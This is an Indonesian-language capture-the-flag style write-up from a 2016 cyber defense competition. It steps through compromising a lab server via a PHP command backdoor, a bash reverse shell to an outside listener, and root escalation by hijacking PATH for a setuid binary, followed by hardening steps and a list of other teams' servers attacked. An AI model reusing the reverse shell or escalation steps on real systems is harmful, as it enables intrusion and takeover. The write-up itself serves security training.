15 Desember 2016 - 02:37:08 - Read: 551

Cyber Network Defense (CND) - CDC 2016

Original TS : Team BukanBetadin

Laporan Tantangan 1 : Password Recovery

Eksekutif Summary :

terdapat banyak port terbuka pada server. Percobaan pada port 80, mendapatkan beberapa petunjuk dan menemukan file dengan root permission (4755) bernama uselessprogram. Aplikasi ini memiliki celah path code injection. Dengan exploitasi di port 38129, mendapatkan akses remote shell dengan permission apache. Untuk mendapatkan root, dilakukan injection path menjadi /tmp dan file /tmp/cat berisi /bin/sh. Ketika uselessprogram dijalankan, mendapatkan akses root.

Laporan Detil :

1. mencari ip server

BukanBetadin xpl # ./ipscanner 172.17.2.0
172.17.2.1 ONLINE
172.17.2.3 ONLINE


2. scan port, tidak perlu. Lgsg mencoba port yg sudah ada pada dokumen.

3. test http options

BukanBetadin arca # nc -vv 172.17.2.3 80
Connection to 172.17.2.3 80 port [tcp/http] succeeded!
OPTIONS / HTTP/1.0
HOST: LOCALHOST
ACCEPT: */*
user-agent: firefox/5

HTTP/1.1 ` OK
Date: Tue, 29 Nov 2016 20:38:36 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Con-Type: httpd/unix-directory

BukanBetadin arca # nection: close
Content


4. view-source:http://172.17.2.3/info.php


error command terlihat di atas.

<div style="display: none;"><br />
<b>Notice</b>:  Undefined index: command in <b>/var/www/html/info.php</b> on line <b>5</b><br />
<br />
<b>Warning</b>:  system(): Cannot execute a blank command in <b>/var/www/html/info.php</b> on line <b>5</b><br />
bool(false)
</div><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>


5. test command http://172.17.2.3/info.php?command=dir

hasil: command di eksekusi (backdoor ditemukan)

<div style="display: none;">info.php  peralatan  uploads
string(28) "info.php  peralatan  uploads"
</div>

6. check current dir

string(13) "/var/www/html"

7. ls current dir

total 8
drwxr-xr-x. 5 root   root    84 Nov 21 13:24 .
drwxr-xr-x. 4 root   root    31 Nov 20 23:47 ..
-rw-------. 1 root   apache  77 Nov 21 13:28 .bash_history
drwxr-xr-x. 2 root   root    27 Nov 20 23:20 .trash
-rw-r--r--. 1 root   root   176 Nov 21 00:02 info.php
drwxr-xr-x. 2 root   root    67 Nov 21 00:37 peralatan
drwxr-xr-x. 2 apache apache   6 Nov 21 00:26 uploads
string(52) "drwxr-xr-x. 2 apache apache   6 Nov 21 00:26 uploads"


8. http://172.17.2.3/info.php?command=ls -la peralatan

drwxr-xr-x. 2 root root    67 Nov 21 00:37 .
drwxr-xr-x. 5 root root    84 Nov 21 13:24 ..
-rw-r--r--. 1 root root 25304 Nov 20 21:33 linuxprivchecker.py
-rw-r--r--. 1 root root   484 Nov 21 12:01 notes.txt
-rw-r--r--. 1 root root   700 Nov 21 00:22 uploader.php
string(55) "-rw-r--r--. 1 root root   700 Nov 21 00:22 uploader.php"


ada uploader

9. view-source:http://172.17.2.3/info.php?command=cat%20/var/www/html/peralatan/notes.txt

dapat pesan:

<div style="display: none;">Gw daritadi ga bisa jalanin shell dari webserver. Kok hebat banget ya phpnya.

Akhirnya gw tanem netcat shell deh. Terpaksa sori soalnya butuh shell

+ Parah banget gw lupa naro netcat shell dimana, tapi selow sih bukan root kok jalannya

Coba lu cek deh, kalo perlu hapus soalnya takut dipake sama hacker.

Sama satu lagi, itu ada folder .trash apaan sih gan?

--ADMIN REPLY--

Gapapa asalkan bukan shell root

Folder .trash itu aplikasi anak gw. Biasa baru belajar pemrograman dia

string(0) ""
</div>

10. lihat direktori view-source:http://172.17.2.3/info.php?command=ls%20-la%20/var/www/html/.trash

ditemukan program berikut:

<div style="display: none;">total 0
drwxr-xr-x. 2 root root 27 Nov 20 23:20 .
drwxr-xr-x. 5 root root 84 Nov 21 13:24 ..
??????????? ? ?    ?     ?            ? uselessprogram
string(54) "??????????? ? ?    ?     ?            ? uselessprogram"
</div>


coba upload lewat uploader, gagal.

11. coba port lain.

BukanBetadin arca # nc -vvu 172.17.2.3 1337
Connection to 172.17.2.3 1337 port [udp/*] succeeded!
Server Reply:
Server Reply:
Server Reply:
Server Reply:
Server Reply: 

12. coba lagi, pipe command.

BukanBetadin arca # nc -vvu 172.17.2.3 1337
Connection to 172.17.2.3 1337 port [udp/*] succeeded!
Server Reply:
Server Reply:
Server Reply:
Server Reply:
Server Reply:
ls
Server Reply:
dir
Server Reply:
dir; ls;
[IDS ALERT] Kamu pintar, coba ssh dengan credential nakal:nakal12345

dapat user nakal:nakal12345

dicoba ternyata honeynet

BukanBetadin arca # ssh nakal@172.17.2.3
nakal@172.17.2.3's password:
Last login: Tue Nov 29 09:33:25 2016 from 172.17.1.222
 _________________
< Ih nakal! >
 -----------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Connection to 172.17.2.3 closed.
BukanBetadin arca # ssh nakal@172.17.2.3
nakal@172.17.2.3's password:
Last login: Wed Nov 30 04:03:13 2016 from 172.17.2.231
 _________________
< Ih nakal! >
 -----------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Connection to 172.17.2.3 closed.
BukanBetadin arca # 


13. coba port yg lain.

BukanBetadin arca # nc -vvu 172.17.2.3 38129
Connection to 172.17.2.3 38129 port [udp/*] succeeded!
dir
ls
info.php
peralatan
uploads
ls -la
total 8
drwxr-xr-x. 5 root   root    84 Nov 21 13:24 .
drwxr-xr-x. 4 root   root    31 Nov 20 23:47 ..
-rw-------. 1 root   apache  77 Nov 21 13:28 .bash_history
-rw-r--r--. 1 root   root   176 Nov 21 00:02 info.php
drwxr-xr-x. 2 root   root    67 Nov 21 00:37 peralatan
drwxr-xr-x. 2 root   root    27 Nov 20 23:20 .trash
drwxr-xr-x. 2 apache apache   6 Nov 21 00:26 uploads
cd .trash

14. sesuai petunjuk sebelumnya, masuk direktori .trash danjalankan uselessprogram

cd .trash
pwd
/var/www/html/.trash
cat .trash

dir
uselessprogram
ls -la
total 12
drwxr-xr-x. 2 root root   27 Nov 20 23:20 .
drwxr-xr-x. 5 root root   84 Nov 21 13:24 ..
-rwsr-sr-x. 1 root root 8656 Nov 20 23:17 uselessprogram

15. reverse shell

/bin/bash -i >& /dev/tcp/172.17.2.231/9090 0>&1

dan masuk

arca@BukanBetadin ~ $ nc -vlp 9090
Listening on [0.0.0.0] (family 0, port 9090)

Connection from [172.17.2.3] port 9090 [tcp/*] accepted (family 2, sport 55798)
bash: no job control in this shell
bash-4.2$
bash-4.2$ 

16. spawn /bin/bash untuk shell lebih interaktif

bash-4.2$ python -c "import pty; pty.spawn('/bin/bash');"
python -c "import pty; pty.spawn('/bin/bash');"
bash-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:initrc_t:s0

17. mencoba uselessprogram dari interaktif shell

bash-4.2$ ./uselessprogram
./uselessprogram
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
systemd-bus-proxy:x:999:997:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:998:996:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:995:User for polkitd:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:996:994::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
udpsecret:x:1001:1001::/home/udpsecret:/bin/bash
apache:x:48:48:Apache:/var/www/html:/bin/bash
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
imap:x:1002:1002::/home/imap:/bin/bash
system:x:1003:1003::/home/system:/bin/bash
nakal:x:1004:1004::/home/nakal:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin

18. analisa string binary useless program

bash-4.2$ string uselessprogram
string uselessprogram
bash: string: command not found
bash-4.2$ strings uselessprogram
strings uselessprogram
/lib64/ld-linux-x86-64.so.2
GI:1
libc.so.6
setuid
system
__libc_start_main
__gmon_start__
GLIBC_2.2.5
UH-@
AWAVA
AUATL
[]A\A]A^A_
cat /etc/passwd
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7585
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
useless.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment\


ditemukan bug pada program.

19. Mencoba exploitasi bug.

bash-4.2$ cp /bin/sh /tmp/sh
cp /bin/sh /tmp/sh
bash-4.2$ export PATH=/tmp
export PATH=/tmp
bash-4.2$ echo $PATH
echo $PATH
/tmp
bash-4.2$ ./uselessprogram

bash-4.2$ /bin/cp /bin/sh /tmp/cat
/bin/cp /bin/sh /tmp/cat
bash-4.2$ /bin/ls -la /tmp
/bin/ls -la /tmp
total 944
drwxrwxrwt.  7 root   root       98 Nov 30 04:16 .
dr-xr-xr-x. 17 root   root     4096 Nov 20 18:15 ..
-rwxr-xr-x.  1 apache apache 960392 Nov 30 04:16 cat
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .font-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .ICE-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .Test-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .X11-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .XIM-unix
bash-4.2$

bash-4.2$ /bin/cp /bin/sh /tmp/cat
/bin/cp /bin/sh /tmp/cat
bash-4.2$ /bin/ls -la /tmp
/bin/ls -la /tmp
total 1884
drwxrwxrwt.  7 root   root      107 Nov 30 04:21 .
dr-xr-xr-x. 17 root   root     4096 Nov 20 18:15 ..
-rwxr-xr-x.  1 apache apache 960392 Nov 30 04:21 cat
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .font-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .ICE-unix
-rwxr-xr-x.  1 apache apache 960392 Nov 30 04:20 sh
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .Test-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .X11-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .XIM-unix
bash-4.2$ pwd
pwd
/var/www/html/.trash
bash-4.2$ 

20. membuat running shell di /tmp/cat

[root@capture-defense tmp]# cat /tmp/cat
#!/bin/bash

/bin/sh

[root@capture-defense tmp]# 

21. lalu ubah password root

uid=0(root) gid=1003(system) groups=1003(system) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# /bin/bash
/usr/libexec/grepconf.sh: line 5: grep: command not found
sh-4.2# passwd root
sh: passwd: command not found
sh-4.2# export PATH=/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/system/.local/bin:/home/system/bin
sh-4.2# /bin/bash
         (__)
         (oo)
   /------\/
  / |    ||   
 *  /\---/\
    ~~   ~~   
...."Have you mooed today?"...
[root@capture-defense tmp]# id
uid=0(root) gid=1003(system) groups=1003(system) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@capture-defense tmp]# pwd
/tmp
[root@capture-defense tmp]# passwd
Changing password for user root.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
[root@capture-defense tmp]# 

21. coba root akses

BukanBetadin xpl # ssh root@172.17.2.3
root@172.17.2.3's password:
Last login: Wed Nov 30 04:19:22 2016 from 172.17.1.100
[root@capture-defense ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@capture-defense ~]# 

Laporan Tantangan 2 (Defence) : System Recovery, Hardening & Network Perimeter

Eksekutif Summary :

melakukan patch pada kelemahan server pada aplikasi vsftp, httpd, squid, /root permission, disallow root useless program

Laporan Detil :

1. Patch bug port 80 pada info.php

<?php
error_reporting(-1);
ini_set('display_errors', 'Off');
#echo '<div style="display: none;">';
#echo var_dump(system($_GET["command"], $retval));
#echo '</div>';
phpinfo();
?>

2. patch executable uselessprogram
3. patch vsftpd. Matikan allow anonymouse.

anonymous_enable=NO

4. patch squid. Matikan allow localhost.
5. disable readable by other user dir /root
6. disable writeable /tmp
7. clean backdoor
8. connection monitoring

Laporan Tantangan 3 : Attacking

Tulis Daftar Tim yang berhasil Anda retas dan ambil alih server.

1.IP Address : 172.17.10.3
Bug : port 38129
Teknik Exploitasi : code injection

IP: 172.17.11.3
bug: port 38129

IP: 172.17.5.3
bug: port 38129

EOF